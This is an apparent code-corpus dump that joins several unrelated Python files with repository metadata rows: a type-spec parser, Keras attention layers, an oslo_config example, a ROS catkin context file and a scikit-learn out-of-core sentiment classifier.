if d and d.kind == 'command':
self.parse_command(spec, nn, d.name)
def parse_enum(self, node):
docs = {}
values = {}
for nn in self.nodes(node.body, 'Assign'):
ident = nn.targets[0].id
ok, val = self.parse_value(nn.value)
if not ok or not _is_scalar(val):
raise ValueError(f'invalid Enum item {ident!r}')
docs[ident] = self.doc_for(nn)
values[ident] = val
self.add(base.TEnum(
doc=_docstring(node),
ident=node.name,
name=self.qname(node),
pos=self.pos,
docs=docs,
values=values,
))
def parse_property(self, owner_type: base.Type, node, annotated: bool):
ident = node.target.id if annotated else node.targets[0].id
if ident.startswith('_'):
return
has_default, default = self.parse_value(node.value)
spec = base.TProperty(
doc=self.doc_for(node),
ident=ident,
name=owner_type.name + DOT + ident,
pos=self.pos,
default=None,
has_default=has_default,
owner_t=owner_type.name,
property_t='any',
)
if has_default:
spec.default = default
property_type = None
if hasattr(node, 'annotation'):
property_type = self.type_from_node(node.annotation)
if not property_type:
typ = 'any'
if spec.has_default and spec.default is not None:
typ = type(spec.default).__name__
property_type = self.type_from_name(typ)
if property_type:
if isinstance(property_type, base.TOptional):
spec.property_t = property_type.target_t
if not spec.has_default:
spec.has_default = True
spec.default = None
else:
spec.property_t = property_type.name
self.add(spec)
def parse_command(self, owner_type: base.Type, node, command_name: str):
# command names are strictly three parts: method . action . name
# e.g. 'cli.server.restart
method, action, cmd = command_name.split(DOT)
spec = base.TCommand(
doc=_docstring(node),
ident=node.name,
name=method + DOT + action + _ucfirst(cmd), # cli.serverRestart
pos=self.pos,
owner_t=owner_type.name,
cmd_action=action, # server
cmd_command=cmd, # restart
cmd_method=method,
cmd_name=action + _ucfirst(cmd), # serverRestart
ext_type=cast(base.TRecord, owner_type).ext_type,
arg_t='any',
ret_t='any',
)
# action methods have only one spec'able arg (the last one)
arg_node = node.args.args[-1]
if arg_node.annotation:
arg_type = self.type_from_node(arg_node.annotation)
spec.arg_t = arg_type.name if arg_type else 'any'
if node.returns:
ret_type = self.type_from_node(node.returns)
spec.ret_t = ret_type.name if ret_type else 'any'
self.add(spec)
def class_decorator(self, node):
d = self.gws_decorator(node)
if not d:
return
# e.g. gws.ext.Config('db.provider.foo')
fn_parts = self.qname(d.func).split(DOT)
ok, arg = self.parse_value(d.args[0])
if not ok:
raise ValueError('invalid argument')
arg_parts = arg.split(DOT)
return base.Data(
category=DOT.join(arg_parts[:-1]), # 'db.provider'
type=arg_parts[-1], # 'foo'
kind=fn_parts[-1], # 'Config'
name=DOT.join(fn_parts[:-1] + arg_parts + fn_parts[-1:]), # 'gws.ext.db.provider.foo.Config'
)
def function_decorator(self, node):
d = self.gws_decorator(node)
if not d:
return
# e.g. gws.ext.command('api.map.renderXYZ')
fn_parts = self.qname(d.func).split(DOT)
kind = fn_parts[-1]
if kind == 'command':
if not d.args:
raise ValueError('invalid argument')
ok, arg = self.parse_value(d.args[0])
if not ok:
raise ValueError('invalid argument')
return base.Data(kind=kind, name=arg)
raise ValueError(f'invalid decorator: "{kind}"')
def gws_decorator(self, node):
for d in getattr(node, 'decorator_list', []):
if _cls(d) == 'Call' and self.qname(d.func).startswith(base.GWS_EXT_PREFIX + DOT):
return d
##
def type_from_node(self, node) -> base.Type:
# here, node is a type declaration (an alias or an annotation)
cc = _cls(node)
# foo: SomeType
if cc in {'Str', 'Name', 'Attribute', 'Constant'}:
return self.type_from_name(self.qname(node))
# foo: Generic[SomeType]
if cc == 'Subscript':
return self.type_from_name(self.qname(node.value), node.slice.value)
# foo: [SomeType, SomeType]
if cc in {'List', 'Tuple'}:
items = [self.type_from_node(e) for e in node.elts]
return self.add(base.TTuple(items=[it.name for it in items]))
raise ValueError(f'unsupported type: {cc!r}')
def type_from_name(self, name: str, param=None) -> base.Type:
if name in self.state.types:
return self.state.types[name]
g = name.split(DOT)[-1].lower()
if g == 'any':
return self.state.types['any']
# literal - 'param' is a value or a tuple of values
if g == 'literal':
if not param:
raise ValueError('invalid literal')
values = []
elts = param.elts if _cls(param) == 'Tuple' else [param]
for elt in elts:
values.append(self.parse_literal_value(elt))
return self.add(base.TLiteral(values=values))
# in other cases, 'param' is a type or a tuple of types
param_type = self.type_from_node(param) if param else None
param_tuple = None
if isinstance(param_type, base.TTuple):
param_tuple = param_type.items
if g == 'optional':
if not param_type:
raise ValueError('invalid optional type')
return self.add(base.TOptional(target_t=param_type.name))
if g == 'list':
return self.add(base.TList(item_t=param_type.name if param_type else 'any'))
if g == 'set':
return self.add(base.TSet(item_t=param_type.name if param_type else 'any'))
if g == 'dict':
if param_tuple:
if len(param_tuple) != 2:
raise ValueError('invalid Dict arguments')
key, val = param_tuple
if key != 'str':
raise ValueError('Dict keys must be str')
elif param_type:
key = 'str'
val = param_type.name
else:
key = 'str'
val = 'any'
return self.add(base.TDict(key_t=key, value_t=val))
if g == 'union':
if not param_tuple:
raise ValueError('invalid Union')
return self.add(base.TUnion(items=sorted(param_tuple)))
if g == 'tuple':
if not param_type:
return self.add(base.TTuple(items=[]))
if not param_tuple:
raise ValueError('invalid Tuple')
return self.add(base.TTuple(items=param_tuple))
if param:
raise ValueError('invalid generic type')
return self.add(base.TUnresolvedReference(name=name))
##
@property
def pos(self):
return {
'module_name': self.module_name,
'module_path': self.module_path,
'lineno': self.context[-1].lineno if self.context else 0,
}
def add(self, t: base.Type) -> base.Type:
if not hasattr(t, 'pos'):
setattr(t, 'pos', self.pos)
self.state.types[t.name] = t
return t
def doc_for(self, node):
if node.lineno in self.docs:
return self.docs[node.lineno]
return ''
def qname(self, node):
name = self.node_name(node)
if name in base.BUILTINS:
return name
name = self.qualified(name)
return name
def qualified(self, name):
for alias, mod in self.imports.items():
if name == mod or name.startswith(mod + DOT):
return name
if name == alias:
return mod
if name.startswith(alias + DOT):
return mod + DOT + name[(len(alias) + 1):]
return self.module_name + DOT + name
def node_name(self, node):
if _cls(node) == 'Name':
return node.id
if _cls(node) == 'Attribute':
return self.node_name(node.value) + DOT + node.attr
if _cls(node) == 'Str':
return node.s
if _cls(node) == 'Constant':
v = node.value
return v if isinstance(v, str) else repr(v)
if _cls(node) == 'ClassDef':
return node.name
raise ValueError('cannot find a node name')
def nodes(self, where, *cls):
if where == 'module':
where = self.module_node.body
for node in where:
if not cls or _cls(node) in cls:
self.context.append(node)
yield node
self.context.pop()
##
def parse_value(self, node):
if node is None:
return False, None
cc = _cls(node)
if cc == 'Num':
return True, node.n
if cc in ('Str', 'Bytes'):
return True, node.s
if cc in ('Constant', 'NameConstant'):
return True, node.value
if cc == 'List':
vals = []
for elt in node.elts:
ok, val = self.parse_value(elt)
if not ok:
raise ValueError(f'invalid list element')
vals.append(val)
return True, vals
if cc == 'Dict':
dct = {}
for k, v in zip(node.keys, node.values):
ok1, key = self.parse_value(k)
ok2, val = self.parse_value(v)
if not ok1 or not ok2:
raise ValueError(f'invalid dict element')
dct[key] = val
return True, dct
if cc == 'Attribute':
# Something.someKey - possible enum value
return True, base.TUncheckedEnum(name=self.qname(node))
base.debug_log(f'unparsed value {cc!r}', base.Data(pos=self.pos))
return False, None
def parse_literal_value(self, node):
cc = _cls(node)
if cc == 'Num':
return node.n
if cc in ('Str', 'Bytes'):
return node.s
if cc in ('Constant', 'NameConstant'):
return node.value
raise ValueError(f'invalid literal value of type {cc!r}')
##
def _module_name(chunk, path):
# <chunk.sourceDir>/a/b/c.py => <chunk.name>.a.b.c
if not path.startswith(chunk.sourceDir):
raise ValueError(f'invalid path {path!r}')
p = path[len(chunk.sourceDir):].split('/')
f = p.pop().split(DOT)[0]
if f != '__init__':
p.append(f)
return chunk.name + DOT.join(p)
def _docstring(node):
try:
b = node.body[0]
if _cls(b) == 'Expr' and _cls(b.value) in ('Constant', 'Str'):
return b.value.s.strip()
except:
pass
return ''
def _is_scalar(val):
return isinstance(val, (str, bytes, int, float, bool))
def _is_type_name(name: str) -> bool:
return (
bool(name)
and name[0].isupper()
and all(s.upper() or s.islower() or s.isdigit() for s in name)
and any(s.islower() for s in name)
)
def _is_a(full_name: str, name: str) -> bool:
# if the name is like 'Object', check if the full name ends with it
# if the name is like 'some.module', check if the full name starts with it
if name[0].isupper():
return full_name == name or full_name.endswith(DOT + name)
return full_name == name or full_name.startswith(name + DOT)
def _cls(node):
return node.__class__.__name__
def _camelize(name):
p = name.split('_')
return p[0] + ''.join(_ucfirst(s) for s in p[1:])
def _ucfirst(s):
return s[0].upper() + s[1:]
_comma = ','.join
| 30.218299
| 105
| 0.537289
|
4e09750451d64d4910c72f9a08e8e6d5dbdf5222
| 24,222
|
py
|
Python
|
layers/attention.py
|
sdadas/yast
|
f9cd471ae3c915acb8111dd85a53acc72348c355
|
[
"Apache-2.0"
] | 2
|
2018-12-18T03:12:13.000Z
|
2018-12-31T18:03:27.000Z
|
layers/attention.py
|
sdadas/yast
|
f9cd471ae3c915acb8111dd85a53acc72348c355
|
[
"Apache-2.0"
] | 6
|
2020-01-28T21:59:18.000Z
|
2022-02-09T23:29:00.000Z
|
layers/attention.py
|
sdadas/yast
|
f9cd471ae3c915acb8111dd85a53acc72348c355
|
[
"Apache-2.0"
] | 1
|
2020-07-07T18:25:15.000Z
|
2020-07-07T18:25:15.000Z
|
from keras import initializers, regularizers, constraints, activations
from keras.engine import Layer, InputSpec
from keras import backend as K
from keras.layers.recurrent import Recurrent
"""
Keras attention layers created by Christos Baziotis (https://github.com/cbaziotis)
- see https://github.com/keras-team/keras/issues/4962
Attention()
Keras Layer that implements an Attention mechanism for temporal data. Supports Masking.
Follows the work of Raffel et al. [https://arxiv.org/abs/1512.08756]
AttentionWithContext()
Keras Layer that implements an Attention mechanism, with a context/query vector, for temporal data. Supports Masking.
Follows the work of Yang et al. [https://www.cs.cmu.edu/~diyiy/docs/naacl16.pdf]
"Hierarchical Attention Networks for Document Classification"
"""
def dot_product(x, kernel):
"""
Wrapper for dot product operation, in order to be compatible with both
Theano and Tensorflow
Args:
x (): input
kernel (): weights
Returns:
"""
if K.backend() == 'tensorflow':
return K.squeeze(K.dot(x, K.expand_dims(kernel)), axis=-1)
else:
return K.dot(x, kernel)
class Attention(Layer):
def __init__(self,
W_regularizer=None, b_regularizer=None,
W_constraint=None, b_constraint=None,
bias=True, **kwargs):
"""
Keras Layer that implements an Attention mechanism for temporal data.
Supports Masking.
Follows the work of Raffel et al. [https://arxiv.org/abs/1512.08756]
# Input shape
3D tensor with shape: `(samples, steps, features)`.
# Output shape
2D tensor with shape: `(samples, features)`.
:param kwargs:
Just put it on top of an RNN Layer (GRU/LSTM/SimpleRNN) with return_sequences=True.
The dimensions are inferred based on the output shape of the RNN.
Note: The layer has been tested with Keras 2.0.6
Example:
model.add(LSTM(64, return_sequences=True))
model.add(Attention())
# next add a Dense layer (for classification/regression) or whatever...
"""
self.supports_masking = True
self.init = initializers.get('glorot_uniform')
self.W_regularizer = regularizers.get(W_regularizer)
self.b_regularizer = regularizers.get(b_regularizer)
self.W_constraint = constraints.get(W_constraint)
self.b_constraint = constraints.get(b_constraint)
self.bias = bias
super(Attention, self).__init__(**kwargs)
def build(self, input_shape):
assert len(input_shape) == 3
self.W = self.add_weight((input_shape[-1],),
initializer=self.init,
name='{}_W'.format(self.name),
regularizer=self.W_regularizer,
constraint=self.W_constraint)
if self.bias:
self.b = self.add_weight((input_shape[1],),
initializer='zero',
name='{}_b'.format(self.name),
regularizer=self.b_regularizer,
constraint=self.b_constraint)
else:
self.b = None
self.built = True
def compute_mask(self, input, input_mask=None):
# do not pass the mask to the next layers
return None
def call(self, x, mask=None):
eij = dot_product(x, self.W)
if self.bias:
eij += self.b
eij = K.tanh(eij)
a = K.exp(eij)
# apply mask after the exp. will be re-normalized next
if mask is not None:
# Cast the mask to floatX to avoid float64 upcasting in theano
a *= K.cast(mask, K.floatx())
# in some cases especially in the early stages of training the sum may be almost zero
# and this results in NaN's. A workaround is to add a very small positive number ε to the sum.
# a /= K.cast(K.sum(a, axis=1, keepdims=True), K.floatx())
a /= K.cast(K.sum(a, axis=1, keepdims=True) + K.epsilon(), K.floatx())
a = K.expand_dims(a)
weighted_input = x * a
return K.sum(weighted_input, axis=1)
def compute_output_shape(self, input_shape):
return input_shape[0], input_shape[-1]
def get_config(self):
config = {
'W_regularizer': regularizers.serialize(self.W_regularizer),
'b_regularizer': regularizers.serialize(self.b_regularizer),
'W_constraint': constraints.serialize(self.W_constraint),
'b_constraint': constraints.serialize(self.b_constraint),
'bias': self.bias
}
base_config = super(Attention, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
class AttentionWithContext(Layer):
"""
Attention operation, with a context/query vector, for temporal data.
Supports Masking.
Follows the work of Yang et al. [https://www.cs.cmu.edu/~diyiy/docs/naacl16.pdf]
"Hierarchical Attention Networks for Document Classification"
by using a context vector to assist the attention
# Input shape
3D tensor with shape: `(samples, steps, features)`.
# Output shape
2D tensor with shape: `(samples, features)`.
How to use:
Just put it on top of an RNN Layer (GRU/LSTM/SimpleRNN) with return_sequences=True.
The dimensions are inferred based on the output shape of the RNN.
Note: The layer has been tested with Keras 2.0.6
Example:
model.add(LSTM(64, return_sequences=True))
model.add(AttentionWithContext())
# next add a Dense layer (for classification/regression) or whatever...
"""
def __init__(self,
W_regularizer=None, u_regularizer=None, b_regularizer=None,
W_constraint=None, u_constraint=None, b_constraint=None,
bias=True, **kwargs):
self.supports_masking = True
self.init = initializers.get('glorot_uniform')
self.W_regularizer = regularizers.get(W_regularizer)
self.u_regularizer = regularizers.get(u_regularizer)
self.b_regularizer = regularizers.get(b_regularizer)
self.W_constraint = constraints.get(W_constraint)
self.u_constraint = constraints.get(u_constraint)
self.b_constraint = constraints.get(b_constraint)
self.bias = bias
super(AttentionWithContext, self).__init__(**kwargs)
def build(self, input_shape):
assert len(input_shape) == 3
self.W = self.add_weight((input_shape[-1], input_shape[-1],),
initializer=self.init,
name='{}_W'.format(self.name),
regularizer=self.W_regularizer,
constraint=self.W_constraint)
if self.bias:
self.b = self.add_weight((input_shape[-1],),
initializer='zero',
name='{}_b'.format(self.name),
regularizer=self.b_regularizer,
constraint=self.b_constraint)
self.u = self.add_weight((input_shape[-1],),
initializer=self.init,
name='{}_u'.format(self.name),
regularizer=self.u_regularizer,
constraint=self.u_constraint)
super(AttentionWithContext, self).build(input_shape)
def compute_mask(self, input, input_mask=None):
# do not pass the mask to the next layers
return None
def call(self, x, mask=None):
uit = dot_product(x, self.W)
if self.bias:
uit += self.b
uit = K.tanh(uit)
ait = K.dot(uit, self.u)
a = K.exp(ait)
# apply mask after the exp. will be re-normalized next
if mask is not None:
# Cast the mask to floatX to avoid float64 upcasting in theano
a *= K.cast(mask, K.floatx())
# in some cases especially in the early stages of training the sum may be almost zero
# and this results in NaN's. A workaround is to add a very small positive number ε to the sum.
# a /= K.cast(K.sum(a, axis=1, keepdims=True), K.floatx())
a /= K.cast(K.sum(a, axis=1, keepdims=True) + K.epsilon(), K.floatx())
a = K.expand_dims(a)
weighted_input = x * a
return K.sum(weighted_input, axis=1)
def compute_output_shape(self, input_shape):
return input_shape[0], input_shape[-1]
class AttentionDecoder(Recurrent):
def __init__(self, units, output_dim,
activation='tanh',
return_probabilities=False,
name='AttentionDecoder',
kernel_initializer='glorot_uniform',
recurrent_initializer='orthogonal',
bias_initializer='zeros',
kernel_regularizer=None,
bias_regularizer=None,
activity_regularizer=None,
kernel_constraint=None,
bias_constraint=None,
**kwargs):
"""
Implements an AttentionDecoder that takes in a sequence encoded by an
encoder and outputs the decoded states
:param units: dimension of the hidden state and the attention matrices
:param output_dim: the number of labels in the output space
references:
Bahdanau, Dzmitry, Kyunghyun Cho, and Yoshua Bengio.
"Neural machine translation by jointly learning to align and translate."
arXiv preprint arXiv:1409.0473 (2014).
"""
self.units = units
self.output_dim = output_dim
self.return_probabilities = return_probabilities
self.activation = activations.get(activation)
self.kernel_initializer = initializers.get(kernel_initializer)
self.recurrent_initializer = initializers.get(recurrent_initializer)
self.bias_initializer = initializers.get(bias_initializer)
self.kernel_regularizer = regularizers.get(kernel_regularizer)
self.recurrent_regularizer = regularizers.get(kernel_regularizer)
self.bias_regularizer = regularizers.get(bias_regularizer)
self.activity_regularizer = regularizers.get(activity_regularizer)
self.kernel_constraint = constraints.get(kernel_constraint)
self.recurrent_constraint = constraints.get(kernel_constraint)
self.bias_constraint = constraints.get(bias_constraint)
super(AttentionDecoder, self).__init__(**kwargs)
self.name = name
self.return_sequences = True # must return sequences
def build(self, input_shape):
"""
See Appendix 2 of Bahdanau 2014, arXiv:1409.0473
for model details that correspond to the matrices here.
"""
self.batch_size, self.timesteps, self.input_dim = input_shape
if self.stateful:
super(AttentionDecoder, self).reset_states()
self.states = [None, None] # y, s
"""
Matrices for creating the context vector
"""
self.V_a = self.add_weight(shape=(self.units,),
name='V_a',
initializer=self.kernel_initializer,
regularizer=self.kernel_regularizer,
constraint=self.kernel_constraint)
self.W_a = self.add_weight(shape=(self.units, self.units),
name='W_a',
initializer=self.kernel_initializer,
regularizer=self.kernel_regularizer,
constraint=self.kernel_constraint)
self.U_a = self.add_weight(shape=(self.input_dim, self.units),
name='U_a',
initializer=self.kernel_initializer,
regularizer=self.kernel_regularizer,
constraint=self.kernel_constraint)
self.b_a = self.add_weight(shape=(self.units,),
name='b_a',
initializer=self.bias_initializer,
regularizer=self.bias_regularizer,
constraint=self.bias_constraint)
"""
Matrices for the r (reset) gate
"""
self.C_r = self.add_weight(shape=(self.input_dim, self.units),
name='C_r',
initializer=self.recurrent_initializer,
regularizer=self.recurrent_regularizer,
constraint=self.recurrent_constraint)
self.U_r = self.add_weight(shape=(self.units, self.units),
name='U_r',
initializer=self.recurrent_initializer,
regularizer=self.recurrent_regularizer,
constraint=self.recurrent_constraint)
self.W_r = self.add_weight(shape=(self.output_dim, self.units),
name='W_r',
initializer=self.recurrent_initializer,
regularizer=self.recurrent_regularizer,
constraint=self.recurrent_constraint)
self.b_r = self.add_weight(shape=(self.units, ),
name='b_r',
initializer=self.bias_initializer,
regularizer=self.bias_regularizer,
constraint=self.bias_constraint)
"""
Matrices for the z (update) gate
"""
self.C_z = self.add_weight(shape=(self.input_dim, self.units),
name='C_z',
initializer=self.recurrent_initializer,
regularizer=self.recurrent_regularizer,
constraint=self.recurrent_constraint)
self.U_z = self.add_weight(shape=(self.units, self.units),
name='U_z',
initializer=self.recurrent_initializer,
regularizer=self.recurrent_regularizer,
constraint=self.recurrent_constraint)
self.W_z = self.add_weight(shape=(self.output_dim, self.units),
name='W_z',
initializer=self.recurrent_initializer,
regularizer=self.recurrent_regularizer,
constraint=self.recurrent_constraint)
self.b_z = self.add_weight(shape=(self.units, ),
name='b_z',
initializer=self.bias_initializer,
regularizer=self.bias_regularizer,
constraint=self.bias_constraint)
"""
Matrices for the proposal
"""
self.C_p = self.add_weight(shape=(self.input_dim, self.units),
name='C_p',
initializer=self.recurrent_initializer,
regularizer=self.recurrent_regularizer,
constraint=self.recurrent_constraint)
self.U_p = self.add_weight(shape=(self.units, self.units),
name='U_p',
initializer=self.recurrent_initializer,
regularizer=self.recurrent_regularizer,
constraint=self.recurrent_constraint)
self.W_p = self.add_weight(shape=(self.output_dim, self.units),
name='W_p',
initializer=self.recurrent_initializer,
regularizer=self.recurrent_regularizer,
constraint=self.recurrent_constraint)
self.b_p = self.add_weight(shape=(self.units, ),
name='b_p',
initializer=self.bias_initializer,
regularizer=self.bias_regularizer,
constraint=self.bias_constraint)
"""
Matrices for making the final prediction vector
"""
self.C_o = self.add_weight(shape=(self.input_dim, self.output_dim),
name='C_o',
initializer=self.recurrent_initializer,
regularizer=self.recurrent_regularizer,
constraint=self.recurrent_constraint)
self.U_o = self.add_weight(shape=(self.units, self.output_dim),
name='U_o',
initializer=self.recurrent_initializer,
regularizer=self.recurrent_regularizer,
constraint=self.recurrent_constraint)
self.W_o = self.add_weight(shape=(self.output_dim, self.output_dim),
name='W_o',
initializer=self.recurrent_initializer,
regularizer=self.recurrent_regularizer,
constraint=self.recurrent_constraint)
self.b_o = self.add_weight(shape=(self.output_dim, ),
name='b_o',
initializer=self.bias_initializer,
regularizer=self.bias_regularizer,
constraint=self.bias_constraint)
# For creating the initial state:
self.W_s = self.add_weight(shape=(self.input_dim, self.units),
name='W_s',
initializer=self.recurrent_initializer,
regularizer=self.recurrent_regularizer,
constraint=self.recurrent_constraint)
self.input_spec = [
InputSpec(shape=(self.batch_size, self.timesteps, self.input_dim))]
self.built = True
def call(self, x):
# store the whole sequence so we can "attend" to it at each timestep
self.x_seq = x
# apply the a dense layer over the time dimension of the sequence
# do it here because it doesn't depend on any previous steps
# thefore we can save computation time:
self._uxpb = self._time_distributed_dense(self.x_seq, self.U_a, b=self.b_a,
input_dim=self.input_dim,
timesteps=self.timesteps,
output_dim=self.units)
return super(AttentionDecoder, self).call(x)
def _time_distributed_dense(self, x, w, b=None, dropout=None,
input_dim=None, output_dim=None,
timesteps=None, training=None):
if not input_dim:
input_dim = K.shape(x)[2]
if not timesteps:
timesteps = K.shape(x)[1]
if not output_dim:
output_dim = K.shape(w)[1]
if dropout is not None and 0. < dropout < 1.:
# apply the same dropout pattern at every timestep
ones = K.ones_like(K.reshape(x[:, 0, :], (-1, input_dim)))
dropout_matrix = K.dropout(ones, dropout)
expanded_dropout_matrix = K.repeat(dropout_matrix, timesteps)
x = K.in_train_phase(x * expanded_dropout_matrix, x, training=training)
# collapse time dimension and batch dimension together
x = K.reshape(x, (-1, input_dim))
x = K.dot(x, w)
if b is not None:
x = K.bias_add(x, b)
# reshape to 3D tensor
if K.backend() == 'tensorflow':
x = K.reshape(x, K.stack([-1, timesteps, output_dim]))
x.set_shape([None, None, output_dim])
else:
x = K.reshape(x, (-1, timesteps, output_dim))
return x
def get_initial_state(self, inputs):
print('inputs shape:', inputs.get_shape())
# apply the matrix on the first time step to get the initial s0.
s0 = activations.tanh(K.dot(inputs[:, 0], self.W_s))
# from keras.layers.recurrent to initialize a vector of (batchsize,
# output_dim)
y0 = K.zeros_like(inputs) # (samples, timesteps, input_dims)
y0 = K.sum(y0, axis=(1, 2)) # (samples, )
y0 = K.expand_dims(y0) # (samples, 1)
y0 = K.tile(y0, [1, self.output_dim])
return [y0, s0]
def step(self, x, states):
ytm, stm = states
# repeat the hidden state to the length of the sequence
_stm = K.repeat(stm, self.timesteps)
# now multiplty the weight matrix with the repeated hidden state
_Wxstm = K.dot(_stm, self.W_a)
# calculate the attention probabilities
# this relates how much other timesteps contributed to this one.
et = K.dot(activations.tanh(_Wxstm + self._uxpb),
K.expand_dims(self.V_a))
at = K.exp(et)
at_sum = K.sum(at, axis=1)
at_sum_repeated = K.repeat(at_sum, self.timesteps)
at /= at_sum_repeated # vector of size (batchsize, timesteps, 1)
# calculate the context vector
context = K.squeeze(K.batch_dot(at, self.x_seq, axes=1), axis=1)
# ~~~> calculate new hidden state
# first calculate the "r" gate:
rt = activations.sigmoid(
K.dot(ytm, self.W_r)
+ K.dot(stm, self.U_r)
+ K.dot(context, self.C_r)
+ self.b_r)
# now calculate the "z" gate
zt = activations.sigmoid(
K.dot(ytm, self.W_z)
+ K.dot(stm, self.U_z)
+ K.dot(context, self.C_z)
+ self.b_z)
# calculate the proposal hidden state:
s_tp = activations.tanh(
K.dot(ytm, self.W_p)
+ K.dot((rt * stm), self.U_p)
+ K.dot(context, self.C_p)
+ self.b_p)
# new hidden state:
st = (1-zt)*stm + zt * s_tp
yt = activations.softmax(
K.dot(ytm, self.W_o)
+ K.dot(stm, self.U_o)
+ K.dot(context, self.C_o)
+ self.b_o)
if self.return_probabilities:
return at, [yt, st]
else:
return yt, [yt, st]
def compute_output_shape(self, input_shape):
"""
For Keras internal compatability checking
"""
if self.return_probabilities:
return (None, self.timesteps, self.timesteps)
else:
return (None, self.timesteps, self.output_dim)
def get_config(self):
"""
For rebuilding models on load time.
"""
config = {
'output_dim': self.output_dim,
'units': self.units,
'return_probabilities': self.return_probabilities
}
base_config = super(AttentionDecoder, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
# check to see if it compiles
if __name__ == '__main__':
from keras.layers import Input, LSTM
from keras.models import Model
from keras.layers.wrappers import Bidirectional
i = Input(shape=(100,104), dtype='float32')
enc = Bidirectional(LSTM(64, return_sequences=True), merge_mode='concat')(i)
dec = AttentionDecoder(32, 4)(enc)
model = Model(inputs=i, outputs=dec)
model.summary()
| 42.198606
| 118
| 0.553175
|
71dd6824844c89126d53e168a3cd7f9ab284bfed
| 489
|
py
|
Python
|
test/oslo_test/module1.py
|
peter-wangxu/python_play
|
5774c192a49ea0c35504697dd75e1c2c8e366097
|
[
"Apache-2.0"
] | null | null | null |
test/oslo_test/module1.py
|
peter-wangxu/python_play
|
5774c192a49ea0c35504697dd75e1c2c8e366097
|
[
"Apache-2.0"
] | null | null | null |
test/oslo_test/module1.py
|
peter-wangxu/python_play
|
5774c192a49ea0c35504697dd75e1c2c8e366097
|
[
"Apache-2.0"
] | null | null | null |
from __future__ import print_function
from oslo_config import cfg
import test1.module2
opt_group = cfg.OptGroup(name='simple',
title='A Simple Example')
simple_opts = [
cfg.BoolOpt('enable', default=False,
help=('True enables, False disables.'))
]
CONF = cfg.CONF
CONF.register_group(opt_group)
CONF.register_opts(simple_opts, opt_group)
if __name__ == "__main__":
CONF(default_config_files=['app.conf'])
print(CONF.simple.enable)
| 25.736842
| 55
| 0.689162
|
40450ac93cfa72bfb0f5daf12a88f7e6e2d8382b
| 369
|
py
|
Python
|
ros/build/waypoint_updater/catkin_generated/pkg.develspace.context.pc.py
|
bryantravissmith/SelfDrivingCar-ND-Capstone
|
58147b0b3977a918b2cf9f182c315c8dd7c041e2
|
[
"MIT"
] | null | null | null |
ros/build/waypoint_updater/catkin_generated/pkg.develspace.context.pc.py
|
bryantravissmith/SelfDrivingCar-ND-Capstone
|
58147b0b3977a918b2cf9f182c315c8dd7c041e2
|
[
"MIT"
] | 11
|
2020-01-28T23:13:19.000Z
|
2022-03-12T00:10:25.000Z
|
ros/build/waypoint_updater/catkin_generated/pkg.develspace.context.pc.py
|
bryantravissmith/SelfDrivingCar-ND-Capstone
|
58147b0b3977a918b2cf9f182c315c8dd7c041e2
|
[
"MIT"
] | null | null | null |
# generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "".split(';') if "" != "" else []
PROJECT_CATKIN_DEPENDS = "".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "".split(';') if "" != "" else []
PROJECT_NAME = "waypoint_updater"
PROJECT_SPACE_DIR = "/capstone/ros/devel"
PROJECT_VERSION = "0.0.0"
| 41
| 68
| 0.704607
|
02442bdca847aaefa807753df4b42bb874f69a5e
| 1,066
|
py
|
Python
|
ch08/main.py
|
stoneflyop1/py_machine_learning
|
18fd635d312f957ca4fcc23d856a1bcd4cf95f48
|
[
"MIT"
] | null | null | null |
ch08/main.py
|
stoneflyop1/py_machine_learning
|
18fd635d312f957ca4fcc23d856a1bcd4cf95f48
|
[
"MIT"
] | null | null | null |
ch08/main.py
|
stoneflyop1/py_machine_learning
|
18fd635d312f957ca4fcc23d856a1bcd4cf95f48
|
[
"MIT"
] | null | null | null |
import pandas as pd
df = pd.read_csv('../data/movie_data.csv')
import cleandata
df['review'] = df['review'].apply(cleandata.preprocessor)
# grid search, 非常耗时
#import gridlearn
#gridlearn.learn(df)
from sklearn.feature_extraction.text import HashingVectorizer
from sklearn.linear_model import SGDClassifier
import tokendata
vect = HashingVectorizer(
decode_error='ignore', n_features=(2 ** 21),
preprocessor=None, tokenizer=tokendata.tokenizer
)
clf = SGDClassifier(loss='log', random_state=1, n_iter=1)
import ooclearn
doc_stream = ooclearn.stream_docs(path='../data/movie_data.csv')
import pyprind # 进度条
pbar = pyprind.ProgBar(45)
import numpy as np
classes = np.array([0, 1])
for _ in range(45):
X_train, y_train = ooclearn.get_minibatch(doc_stream, size=1000)
if not X_train: break
X_train = vect.transform(X_train)
clf.partial_fit(X_train, y_train, classes=classes)
pbar.update()
X_test, y_test = ooclearn.get_minibatch(doc_stream, size=5000)
X_test = vect.transform(X_test)
print('Accuracy: %.3f' % clf.score(X_test, y_test))
| 28.810811
| 68
| 0.752345
|
facb76938b3e6e7a2c3b52ab8531fee900bfdcdc
| 563
|
py
|
Python
|
timeline/utils.py
|
vstasn/django-shop-schedule
|
e48ae78454d0e0687b96c07e4877ffacf466a8fd
|
[
"MIT"
] | null | null | null |
timeline/utils.py
|
vstasn/django-shop-schedule
|
e48ae78454d0e0687b96c07e4877ffacf466a8fd
|
[
"MIT"
] | null | null | null |
timeline/utils.py
|
vstasn/django-shop-schedule
|
e48ae78454d0e0687b96c07e4877ffacf466a8fd
|
[
"MIT"
] | null | null | null |
import datetime
def format_time(day_of_week, time):
return "{}{:02d}{:02d}".format(day_of_week, time.hour, time.minute)
def timetostring(rtime):
full_date = datetime.datetime.strptime(str(rtime).zfill(5), "%w%H%M")
return "{:02d}.{:02d}".format(full_date.hour, full_date.minute)
def subminutes(time1, minutes):
tmp_datetime = datetime.datetime.combine(datetime.date(1, 1, 1), time1)
return (tmp_datetime - datetime.timedelta(minutes=minutes)).time()
def next_weekday(day_of_week):
return 0 if day_of_week == 6 else day_of_week + 1
| 28.15
| 75
| 0.714032
|
2280b99146eb01e95ad8e96290b2e4c19fb52266
| 27,007
|
py
|
Python
|
sdk/network/azure-mgmt-network/azure/mgmt/network/v2019_09_01/operations/_application_security_groups_operations.py
|
vbarbaresi/azure-sdk-for-python
|
397ba46c51d001ff89c66b170f5576cf8f49c05f
|
[
"MIT"
] | 8
|
2021-01-13T23:44:08.000Z
|
2021-03-17T10:13:36.000Z
|
sdk/network/azure-mgmt-network/azure/mgmt/network/v2019_09_01/operations/_application_security_groups_operations.py
|
vbarbaresi/azure-sdk-for-python
